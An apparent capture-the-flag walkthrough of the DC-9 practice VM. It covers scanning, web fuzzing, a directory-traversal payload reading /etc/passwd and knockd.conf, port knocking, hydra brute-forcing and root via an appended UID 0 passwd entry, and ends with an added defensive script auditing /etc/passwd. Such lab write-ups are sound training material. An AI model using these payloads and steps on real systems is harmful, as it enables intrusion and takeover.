DC-9 Walkthrough (Vulnhub)
Intro:
This VM is part of the TJ_Null list to prepare for the OSCP; you can download it here.
NB: A good way of learning is to solve these problems yourself first and then see how others solved them.
Start by downloading the VM, make sure it is on the same network as your Kali machine, and let's get started!
Scanning:
Looking for the IP address:
netdiscover
Looking for open ports (without details):
export IP=YOUR_IP_ADDRESS
nmap -p- -A $IP

Enum:
PS: always choose HTTP over SSH.
export URL=http://$IP
nikto -h $URL -C all

Don't forget to note your findings.
Next, we need to fuzz for files and directories:
export FUZZ=$URL/FUZZ
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 $FUZZ

export FUZZ=$URL/FUZZ/
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 $FUZZ

Next, let's try manual discovery/fuzzing.
Add the IP to the /etc/hosts file.
/search.php is vulnerable to SQLi.

Exploitation:
We will use two methods to perform the SQL injection:
1. Automatic: using SQLMap (not allowed in the OSCP exam)
2. Manual testing
We performed both of them in this Medium post.
> We found some hashes and users' passwords
Crack the admin hash at hashes.com.

MySQL credentials: admin | transorbital1
Once logged in, this error message appears:

The page is parsing for a file, so let's try including a file path in the URL with some parameters.

>>> it worked !!!
To be sure:
export URL="http://192.168.204.143/welcome.php?FUZZ=../../../../../etc/passwd"
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --hc 404,302 --hh 963 -b "PHPSESSID=5btif1i2v7p0u6uho4ocu3kko0" $URL
We have directory traversal !!!
Trying RFI


Trying LFI

It hung while loading >>> LFI
What didn't work:
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/www/html/index.php
/home/USER/.ssh/id_rsa

http://url/welcome.php?file=../../../../../../etc/knockd.conf
revealed SSH information.
Let's try a port knocking attack, since we now have the openSSH sequence:
for X in 4000 5000 6000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $X $IP; done
Replace the ports with the OPEN sequence from knockd.conf:
for X in 7469 8475 9842; do nmap -Pn --host-timeout 201 --max-retries 0 -p $X $IP; done

SSH is now open !!!

Launch hydra using the user and pass files from earlier.

Log in using SSH.
sudo -l didn't reveal anything on the three users.
We found another password file inside janitor's home directory.

Add it to the pass file and re-launch hydra.

B4-Tru3-001
sudo -l on fredf:

What is it?



Since the allowed script can read and append, we can append a user to /etc/passwd.
So let's create a password hash using OpenSSL

in this format:
USER:PASSWORD:0:0:USER:/home/USER:/bin/bash
Paste it into a file in the user's home directory.


It has been added to /etc/passwd, and now we're root.
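As an added defensive check that is not part of the original walkthrough: a short Python audit that flags the kind of /etc/passwd entry created in this step (a second UID 0 account, or a password hash stored inline instead of deferring to /etc/shadow). The sample file content and the hash value are constructed placeholders.

```python
"""Audit /etc/passwd content for the kind of entry appended above.

Added example, not part of the DC-9 walkthrough. It flags accounts with UID 0
other than root, entries whose password field holds a hash (or nothing)
instead of the 'x' placeholder that defers to /etc/shadow, and malformed
lines. Run it on a real file with: audit_passwd(open("/etc/passwd").read())
"""
from typing import List, Tuple

Finding = Tuple[int, str, str]  # (line number, user, reason)

# Constructed sample: a normal file plus one rogue entry in the
# USER:HASH:0:0:USER:/home/USER:/bin/bash format used in the walkthrough.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1003:1003:,,,:/home/fredf:/bin/bash
bob:$1$saltsalt$PLACEHOLDER_HASH_NOT_REAL:0:0:bob:/home/bob:/bin/bash
"""


def audit_passwd(content: str) -> List[Finding]:
    findings: List[Finding] = []
    for n, line in enumerate(content.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((n, line, "malformed entry (expected 7 fields)"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if not uid.isdigit():
            findings.append((n, user, "non-numeric UID"))
            continue
        # Any extra UID 0 login is a second root; this is what the walkthrough creates.
        if uid == "0" and user != "root":
            findings.append((n, user, "UID 0 account other than root"))
        # 'x' defers to /etc/shadow; '*' and '!...' are locked. Anything else is
        # either a world-readable hash or an empty (passwordless) field.
        if pw == "":
            findings.append((n, user, "empty password field"))
        elif pw != "x" and not pw.startswith(("*", "!")):
            findings.append((n, user, "password hash stored in /etc/passwd"))
    return findings


if __name__ == "__main__":
    for line_no, user, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line_no}: {user}: {reason}")
```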

I hope this has been fun, until next time!